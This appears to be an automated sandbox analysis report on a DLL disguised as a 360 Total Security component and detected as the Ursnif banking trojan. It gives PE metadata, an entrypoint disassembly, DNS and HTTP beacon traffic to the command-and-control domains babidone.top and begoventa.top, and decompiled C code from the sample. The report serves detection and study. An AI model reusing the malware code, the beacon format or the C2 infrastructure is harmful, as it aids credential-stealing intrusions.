                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:9f377d945db467e35cbad38db9412261

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=CXCBDHWDYFSIVYHKIN
                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                          Error Number:-2146762487
                          Not Before, Not After
                          • 1/11/2021 10:01:25 PM 12/31/2039 3:59:59 PM
                          Subject Chain
                          • CN=CXCBDHWDYFSIVYHKIN
                          Version:3
                          Thumbprint MD5:50CCAE9553A1CBB0CD2802851EF63025
                          Thumbprint SHA-1:01B4FBF379C40FFDE1FA7EABB4BF154CBC3DEBE8
                          Thumbprint SHA-256:90953EF6995AD2794D281E501D865F73B73CA5DA97C8DC220BACA4F8371DC391
                          Serial:5AE69522318BF5BC44A76492C927CD62

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 54h
                          mov dword ptr [ebp-08h], 00000001h
                          mov dword ptr [ebp-04h], 00000000h
                          mov eax, ebp
                          mov ecx, dword ptr [eax+08h]
                          mov dword ptr [1004FCCCh], ecx
                          mov dword ptr [1004FCACh], ebp
                          mov dword ptr [ebp-0Ch], 00000001h
                          mov dword ptr [ebp-10h], 00000001h
                          mov eax, dword ptr [ebp-10h]
                          push eax
                          call dword ptr [1004EDB8h]
                          mov ecx, dword ptr [ebp-10h]
                          push ecx
                          call dword ptr [1004EDBCh]
                          mov edx, dword ptr [ebp-0Ch]
                          push edx
                          call dword ptr [1004ED18h]
                          call dword ptr [1004ED1Ch]
                          movzx eax, byte ptr [ebp-0Ch]
                          push eax
                          call dword ptr [1004ED20h]
                          call dword ptr [1004ED24h]
                          mov ecx, dword ptr [ebp-10h]
                          push ecx
                          call dword ptr [1004EDC0h]
                          mov edx, dword ptr [ebp-10h]
                          push edx
                          call dword ptr [1004EDC4h]
                          mov eax, dword ptr [ebp-0Ch]
                          push eax
                          call dword ptr [1004EDC8h]
                          mov ecx, dword ptr [ebp-10h]
                          push ecx
                          call dword ptr [1004EDCCh]
                          mov edx, dword ptr [ebp-0Ch]
                          push edx
                          call dword ptr [1004EDD0h]
                          mov eax, dword ptr [ebp-10h]
                          push eax
                          call dword ptr [1004EDD4h]
                          mov ecx, dword ptr [ebp-0Ch]
                          push ecx
                          call dword ptr [1004ED18h]
                          call dword ptr [1004ED28h]
                          mov edx, dword ptr [ebp-10h]
                          push edx
                          call dword ptr [1004EDD8h]
                          call dword ptr [1004ED2Ch]
                          mov eax, dword ptr [ebp-0Ch]

                          Data Directories

                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4e7f8 | 0xa0 | .data
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0xa01c | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x57e00 | 0x1558 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5b000 | 0x484 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x4ebb0 | 0x318 | .data
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                          Sections

                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x3306f | 0x33200 | False | 0.254675084046 | data | 4.93227847652 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .data2 | 0x35000 | 0x64 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .data | 0x36000 | 0x19d28 | 0x19e00 | False | 0.0270135114734 | data | 0.511152308625 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x50000 | 0xa01c | 0xa200 | False | 0.571445794753 | data | 6.6335343619 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x5b000 | 0x484 | 0x600 | False | 0.688151041667 | data | 5.65875691292 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          Name | RVA | Size | Type | Language | Country
                          RT_ICON | 0x50358 | 0x4716 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | Chinese | China
                          RT_ICON | 0x54a70 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | Chinese | China
                          RT_ICON | 0x57018 | 0x10a8 | data | Chinese | China
                          RT_ICON | 0x580c0 | 0x988 | data | Chinese | China
                          RT_ICON | 0x58a48 | 0x468 | GLS_BINARY_LSB_FIRST | Chinese | China
                          RT_DIALOG | 0x58eb0 | 0x42 | data | Chinese | China
                          RT_DIALOG | 0x58ef4 | 0x34 | data | Chinese | China
                          RT_DIALOG | 0x58f28 | 0x60 | data | Chinese | China
                          RT_DIALOG | 0x58f88 | 0x42 | data | Chinese | China
                          RT_RCDATA | 0x58fcc | 0x200 | ASCII text, with very long lines, with CRLF line terminators | English | United States
                          RT_RCDATA | 0x591cc | 0x80 | data | English | United States
                          RT_GROUP_ICON | 0x5924c | 0x4c | data | Chinese | China
                          RT_VERSION | 0x59298 | 0x2b4 | data | Chinese | Taiwan
                          RT_VERSION | 0x5954c | 0x2b4 | data | English | United States
                          RT_VERSION | 0x59800 | 0x2b4 | data | Portuguese | Brazil
                          RT_VERSION | 0x59ab4 | 0x2b4 | data | Turkish | Turkey
                          RT_VERSION | 0x59d68 | 0x2b4 | data | Chinese | China

                          Imports

                          DLL | Import
                          KERNEL32.dll | QueryPerformanceFrequency, GetDateFormatW, ResetEvent, QueryPerformanceCounter, SetEvent, GetCurrentProcess, OpenEventW, ResumeThread, WaitForSingleObject, DuplicateHandle, WriteFile, GetLastError, GetExitCodeThread, CreateFileW, MoveFileW, lstrlenA, ReadFile, Sleep, GetFileSize, CreateEventW, GetLocaleInfoW, CloseHandle, GetLocalTime, LoadLibraryW, GetWindowsDirectoryW, FormatMessageW, CreateProcessW, LocalFree, FindFirstFileW, CopyFileW, FindClose, SetLastError, CreateDirectoryW, lstrlenW, GetSystemDirectoryW, GetTempPathW, GetDriveTypeW, GetFileTime, GetUserDefaultLCID, ExpandEnvironmentStringsW, GetPrivateProfileStringW, GetFileInformationByHandle, GetFileAttributesA, FileTimeToDosDateTime, GetSystemInfo, CreateFileA, WideCharToMultiByte, FileTimeToLocalFileTime, lstrcmpiW, GetTempFileNameW, GetFileAttributesW, GetProcAddress, LocalAlloc, GetModuleHandleW, GetStartupInfoW, DeleteFileW, ExitProcess, GetTickCount, LoadLibraryA, MultiByteToWideChar, FreeLibrary, GetModuleHandleA, GetStdHandle, GetConsoleScreenBufferInfo, VirtualAlloc, HeapFree, GetProcessHeap, HeapAlloc, VirtualFree, SetConsoleCtrlHandler, lstrcpyA, FindFirstFileA, GetWindowsDirectoryA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetPrivateProfileStringA, SetUnhandledExceptionFilter, lstrcatW, lstrcmpiA, GetSystemDefaultLCID, GetSystemWindowsDirectoryW, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, UnhandledExceptionFilter, GetStartupInfoA
                          USER32.dll | LoadIconW, CopyIcon, GetProcessWindowStation, IsCharAlphaA, GetKBCodePage, GetInputState, GetActiveWindow, GetWindowTextLengthA, IsWindowEnabled, IsIconic, PaintDesktop, GetTopWindow, GetMenuContextHelpId, GetListBoxInfo, GetSysColorBrush, GetKeyState, LoadCursorFromFileW, GetMenuCheckMarkDimensions, GetKeyboardLayout, IsWindow, CloseWindowStation, VkKeyScanW, CharLowerA, DrawMenuBar, CharNextW, IsCharUpperA, IsGUIThread, OpenIcon, IsCharLowerW, GetClipboardData
                          GDI32.dll | GetKerningPairsA, CreateEllipticRgn, PATHOBJ_vEnumStartClipLines, GetBoundsRect, FONTOBJ_pfdg, GetDIBColorTable, SetTextCharacterExtra, GetTextFaceW, GetColorSpace, RealizePalette, SetMetaRgn, CreateHalftonePalette, PathToRegion, GetObjectType, GetStretchBltMode, GetDCBrushColor, GetFontLanguageInfo, GetSystemPaletteUse, GetTextColor, CreatePatternBrush, GetEnhMetaFileA, CloseFigure, GetLayout, CloseEnhMetaFile, GetTextCharset, GetEnhMetaFileW, GetGraphicsMode, AddFontResourceW, FlattenPath, SaveDC, GdiGetBatchLimit, GetDCPenColor, EndDoc, EndPage, GetROP2, GetMapMode, GetStockObject, StrokePath, DeleteObject
                          COMDLG32.dll | GetOpenFileNameW
                          ADVAPI32.dll | IsTextUnicode, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegEnumKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExW, RegDeleteKeyW, RegDeleteValueW, RegGetKeySecurity, RegOpenKeyW, RegSetKeySecurity, RegConnectRegistryW
                          SHELL32.dll | ExtractIconW, DragQueryFileAorW, SHBindToParent, DoEnvironmentSubstW, ExtractIconA, ShellExecuteA, SHCreateProcessAsUserW, SHPathPrepareForWriteW, SHPathPrepareForWriteA, SHIsFileAvailableOffline, ExtractAssociatedIconW, SHGetSpecialFolderPathA, ShellExecuteEx, DragAcceptFiles, ExtractAssociatedIconA
                          SHLWAPI.dll | StrChrIA, StrRChrIW, StrCmpNW, StrChrA

                          Version Infos

                          Description | Data
                          LegalCopyright | Copyright (C) 2016
                          InternalName | 360SkinView
                          FileVersion | 1,0,0,1036
                          ProductName | 360 Total Security
                          ProductVersion | 1,0,0,1036
                          FileDescription | 360 Total Security
                          OriginalFilename | 360SkinView.exe
                          Translation | 0x0409 0x04b0

                          Possible Origin

                          Language of compilation system | Country where language is spoken
                          Chinese | China
                          English | United States
                          Chinese | Taiwan
                          Portuguese | Brazil
                          Turkish | Turkey

                          Network Behavior

                          TCP Packets

                          UDP Packets

                          DNS Queries

                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                          Jan 12, 2021 18:10:49.856673002 CET | 192.168.2.3 | 8.8.8.8 | 0x7022 | Standard query (0) | babidone.top | A (IP address) | IN (0x0001)
                          Jan 12, 2021 18:11:04.371150970 CET | 192.168.2.3 | 8.8.8.8 | 0x921d | Standard query (0) | babidone.top | A (IP address) | IN (0x0001)
                          Jan 12, 2021 18:11:50.897178888 CET | 192.168.2.3 | 8.8.8.8 | 0xce42 | Standard query (0) | begoventa.top | A (IP address) | IN (0x0001)
                          Jan 12, 2021 18:12:12.751403093 CET | 192.168.2.3 | 8.8.8.8 | 0x4b5d | Standard query (0) | babidone.top | A (IP address) | IN (0x0001)

                          DNS Answers

                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                          Jan 12, 2021 18:10:50.276988029 CET | 8.8.8.8 | 192.168.2.3 | 0x7022 | No error (0) | babidone.top | | 193.56.255.166 | A (IP address) | IN (0x0001)
                          Jan 12, 2021 18:11:04.430051088 CET | 8.8.8.8 | 192.168.2.3 | 0x921d | Server failure (2) | babidone.top | none | none | A (IP address) | IN (0x0001)
                          Jan 12, 2021 18:11:51.312241077 CET | 8.8.8.8 | 192.168.2.3 | 0xce42 | No error (0) | begoventa.top | | 47.91.89.242 | A (IP address) | IN (0x0001)
                          Jan 12, 2021 18:12:13.178747892 CET | 8.8.8.8 | 192.168.2.3 | 0x4b5d | No error (0) | babidone.top | | 193.56.255.166 | A (IP address) | IN (0x0001)

                          HTTP Request Dependency Graph

                          • begoventa.top

                          HTTP Packets

                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.3 | 49746 | 47.91.89.242 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Jan 12, 2021 18:11:51.384207964 CET | 4237 | OUT | GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1
                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                          Accept-Language: en-US
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Accept-Encoding: gzip, deflate
                          Host: begoventa.top
                          Connection: Keep-Alive
                          Jan 12, 2021 18:11:51.427160025 CET | 4238 | IN | HTTP/1.0 503 Service Unavailable
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.3 | 49747 | 47.91.89.242 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Jan 12, 2021 18:11:51.820136070 CET | 4238 | OUT | GET /favicon.ico HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: begoventa.top
                          Connection: Keep-Alive
                          Jan 12, 2021 18:11:51.863253117 CET | 4238 | IN | HTTP/1.0 503 Service Unavailable
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                          Code Manipulations

                          System Behavior

                          General

                          Start time:18:09:26
                          Start date:12/01/2021
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
                          Imagebase:0x1230000
                          File size:120832 bytes
                          MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                          Reputation:moderate

                          General

                          Start time:18:10:04
                          Start date:12/01/2021
                          Path:C:\Program Files\internet explorer\iexplore.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                          Imagebase:0x7ff7f5860000
                          File size:823560 bytes
                          MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:10:04
                          Start date:12/01/2021
                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
                          Imagebase:0x300000
                          File size:822536 bytes
                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:10:47
                          Start date:12/01/2021
                          Path:C:\Program Files\internet explorer\iexplore.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                          Imagebase:0x7ff7488e0000
                          File size:823560 bytes
                          MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:10:48
                          Start date:12/01/2021
                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
                          Imagebase:0x300000
                          File size:822536 bytes
                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:11:25
                          Start date:12/01/2021
                          Path:C:\Program Files\internet explorer\iexplore.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                          Imagebase:0x7ff7f5860000
                          File size:823560 bytes
                          MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:11:25
                          Start date:12/01/2021
                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
                          Imagebase:0x300000
                          File size:822536 bytes
                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:11:48
                          Start date:12/01/2021
                          Path:C:\Program Files\internet explorer\iexplore.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                          Imagebase:0x7ff7f5860000
                          File size:823560 bytes
                          MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:18:11:49
                          Start date:12/01/2021
                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
                          Imagebase:0x300000
                          File size:822536 bytes
                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Code Analysis

                            Executed Functions

                            C-Code - Quality: 93%
                            			E00CF523C(signed char* __eax, intOrPtr* _a4) {
                            				signed int _v12;
                            				void* _v16;
                            				CHAR* _v20;
                            				struct _FILETIME _v28;
                            				void* _v32;
                            				void* _v36;
                            				char* _v40;
                            				signed int _v44;
                            				long _v344;
                            				struct _WIN32_FIND_DATAA _v368;
                            				signed int _t72;
                            				void* _t74;
                            				signed int _t76;
                            				void* _t78;
                            				intOrPtr _t81;
                            				CHAR* _t83;
                            				void* _t85;
                            				signed char _t89;
                            				signed char _t91;
                            				intOrPtr _t93;
                            				void* _t96;
                            				long _t99;
                            				int _t101;
                            				signed int _t109;
                            				char* _t111;
                            				void* _t113;
                            				int _t119;
                            				char _t128;
                            				void* _t134;
                            				signed int _t136;
                            				char* _t139;
                            				signed int _t140;
                            				char* _t141;
                            				char* _t146;
                            				signed char* _t148;
                            				int _t151;
                            				void* _t152;
                            				void* _t153;
                            				void* _t154;
                            				void* _t165;
                            
                            				_v12 = _v12 & 0x00000000;
                            				_t148 = __eax;
                            				_t72 =  *0xcfd2a0; // 0x63699bc3
                            				_t74 = RtlAllocateHeap( *0xcfd238, 0, _t72 ^ 0x63699ac7);
                            				_v20 = _t74;
                            				if(_t74 == 0) {
                            					L36:
                            					return _v12;
                            				}
                            				_t76 =  *0xcfd2a0; // 0x63699bc3
                            				_t78 = RtlAllocateHeap( *0xcfd238, 0, _t76 ^ 0x63699bce);
                            				_t146 = 0;
                            				_v36 = _t78;
                            				if(_t78 == 0) {
                            					L35:
                            					HeapFree( *0xcfd238, _t146, _v20);
                            					goto L36;
                            				}
                            				_t136 =  *0xcfd2a0; // 0x63699bc3
                            				memset(_t78, 0, _t136 ^ 0x63699bce);
                            				_t81 =  *0xcfd2a4; // 0x247a5a8
                            				_t154 = _t153 + 0xc;
                            				_t5 = _t81 + 0xcfe7f2; // 0x73797325
                            				_t83 = E00CF27B6(_t5);
                            				_v20 = _t83;
                            				if(_t83 == 0) {
                            					L34:
                            					HeapFree( *0xcfd238, _t146, _v36);
                            					goto L35;
                            				}
                            				_t134 = 0xffffffffffffffff;
                            				_v28.dwLowDateTime = 0x63699bce;
                            				_v28.dwHighDateTime = 0x63699bce;
                            				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                            				_v32 = _t85;
                            				if(_t85 != 0x63699bce) {
                            					GetFileTime(_t85,  &_v28, 0, 0);
                            					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                            					asm("adc dword [ebp-0x14], 0xc9"); // executed
                            					FindCloseChangeNotification(_v32); // executed
                            				}
                            				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                            				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                            				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                            				 *_t148 = _t91;
                            				_v32 = _t91 & 0x000000ff;
                            				_t93 =  *0xcfd2a4; // 0x247a5a8
                            				_t16 = _t93 + 0xcfe813; // 0x642e2a5c
                            				_v40 = _t146;
                            				_v44 = _t89 & 0x000000ff;
                            				__imp__(_v20, _t16);
                            				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                            				_v16 = _t96;
                            				if(_t96 == _t134) {
                            					_t146 = 0;
                            					goto L34;
                            				}
                            				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                            				while(_t99 > 0) {
                            					_t101 = FindNextFileA(_v16,  &_v368); // executed
                            					if(_t101 == 0) {
                            						FindClose(_v16);
                            						_v16 = FindFirstFileA(_v20,  &_v368);
                            						_v28.dwHighDateTime = _v344;
                            						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                            					}
                            					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                            				}
                            				_v12 = _v12 & 0x00000000;
                            				while(1) {
                            					_t109 = _v44;
                            					if(_v12 <= _t109) {
                            						goto L15;
                            					}
                            					_t140 = _v12;
                            					if(_t140 > _v32) {
                            						_t141 = _v36;
                            						 *_a4 = _t141;
                            						while(1) {
                            							_t128 =  *_t141;
                            							if(_t128 == 0) {
                            								break;
                            							}
                            							if(_t128 < 0x30) {
                            								 *_t141 = _t128 + 0x20;
                            							}
                            							_t141 = _t141 + 1;
                            						}
                            						_v12 = 1;
                            						FindClose(_v16); // executed
                            						_t146 = 0;
                            						goto L35;
                            					}
                            					_t165 = _t140 - _t109;
                            					L15:
                            					if(_t165 == 0 || _v12 == _v32) {
                            						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                            						_t139 = _v40;
                            						_t151 = _t111 -  &(_v368.cFileName);
                            						_t113 = 0;
                            						if(_t139 != 0) {
                            							_t48 = _t151 - 4; // -4
                            							_t113 = _t48;
                            							if(_t113 > _t151) {
                            								_t113 = 0;
                            							}
                            						}
                            						if(_t151 > 4) {
                            							_t151 = 4;
                            						}
                            						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                            						_t154 = _t154 + 0xc;
                            						_v40 =  &(_v40[_t151]);
                            					}
                            					do {
                            						_t119 = FindNextFileA(_v16,  &_v368); // executed
                            						if(_t119 == 0) {
                            							FindClose(_v16);
                            							_v16 = FindFirstFileA(_v20,  &_v368);
                            						}
                            					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                            					_v12 = _v12 + 1;
                            				}
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00CF5267
                            • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00CF5289
                            • memset.NTDLL ref: 00CF52A3
                              • Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00CF5073,63699BCE,00CF52BC,73797325), ref: 00CF27C7
                              • Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00CF27E1
                            • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00CF52E1
                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00CF52F5
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CF530C
                            • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00CF5318
                            • lstrcat.KERNEL32(?,642E2A5C), ref: 00CF5359
                            • FindFirstFileA.KERNELBASE(?,?), ref: 00CF536F
                            • CompareFileTime.KERNEL32(?,?), ref: 00CF538D
                            • FindNextFileA.KERNELBASE(00CF568F,?), ref: 00CF53A1
                            • FindClose.KERNEL32(00CF568F), ref: 00CF53AE
                            • FindFirstFileA.KERNEL32(?,?), ref: 00CF53BA
                            • CompareFileTime.KERNEL32(?,?), ref: 00CF53DC
                            • StrChrA.SHLWAPI(?,0000002E), ref: 00CF540F
                            • memcpy.NTDLL(00000000,?,00000000), ref: 00CF5448
                            • FindNextFileA.KERNELBASE(00CF568F,?), ref: 00CF545D
                            • FindClose.KERNEL32(00CF568F), ref: 00CF546A
                            • FindFirstFileA.KERNEL32(?,?), ref: 00CF5476
                            • CompareFileTime.KERNEL32(?,?), ref: 00CF5486
                            • FindClose.KERNELBASE(00CF568F), ref: 00CF54BB
                            • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00CF54CD
                            • HeapFree.KERNEL32(00000000,?), ref: 00CF54DD
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                            • String ID:
                            • API String ID: 2944988578-0
                            • Opcode ID: 5d60285afdaf957d876f5c921657b575027a6cdb1f9cc937f6ee9557bfacd089
                            • Instruction ID: f68830781c399b77f7a2df39d3dcde8afc6a8538959ad51977e38682ce8bb5da
                            • Opcode Fuzzy Hash: 5d60285afdaf957d876f5c921657b575027a6cdb1f9cc937f6ee9557bfacd089
                            • Instruction Fuzzy Hash: 3A81477190021DAFDB109FA5DC84BFEBBB9EB44301F10406AE715E6260E7719A85CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E100019C7(void* __edi, long _a4) {
                            				long _v8;
                            				struct _SYSTEMTIME _v24;
                            				void* _v48;
                            				long _t25;
                            				int _t27;
                            				long _t30;
                            				long _t31;
                            				void* _t32;
                            				long _t35;
                            				long _t36;
                            				long _t40;
                            				void* _t45;
                            				intOrPtr _t48;
                            				signed int _t53;
                            				void* _t58;
                            				signed int _t61;
                            				void* _t64;
                            				intOrPtr* _t65;
                            
                            				_t25 = E10001799();
                            				_v8 = _t25;
                            				if(_t25 != 0) {
                            					return _t25;
                            				}
                            				do {
                            					GetSystemTime( &_v24);
                            					_t27 = SwitchToThread();
